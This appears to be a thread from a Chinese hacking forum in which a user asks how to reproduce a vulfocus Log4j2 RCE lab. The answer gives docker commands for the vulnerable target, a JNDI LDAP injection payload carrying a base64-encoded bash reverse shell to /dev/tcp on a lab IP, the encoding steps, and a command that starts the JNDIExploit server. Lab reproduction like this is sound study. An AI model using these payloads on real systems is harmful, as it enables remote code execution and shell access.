跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

精选回复

发布于

这个靶场怎么漏洞复现?有同学了解吗??

 

由TxxT解决

转到解决

没了解过

  • 解答

搭建靶场

sudo docker pull vulfocus/log4j2-rce-2021-12-09

sudo docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09
 

这里我直接kali拉取这个靶场,然后访问端口38080/hello
http://image.g3et.cn/image_1639560929634.png

2、漏洞复现

(1)抓包
http://image.g3et.cn/image_1639561069927.png
(2)构造payload

这是我的payload
payload=${jndi:ldap://192.168.226.131:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjIyNi4xMzEvNjY2NiAwPiYx}
 
payload=${jndi:ldap://192.168.0.104:1389/TomcatBypass/Command/Base64/bash -i >& /dev/tcp/192.168.0.104/6666 0>&1}
bash -i >& /dev/tcp/192.168.0.104/6666 0>&1 这段要进行一次base64编码,然后两次url编码
 

(3)开启一个JNDI恶意服务

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip 这里填kali的Ip)
 

http://image.g3et.cn/image_1639561278244.png
(4)反弹shell
http://image.g3et.cn/image_1639561301913.png
(5)设置好payload点击发送即可反弹shell
http://image.g3et.cn/image_1639561350563.png

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。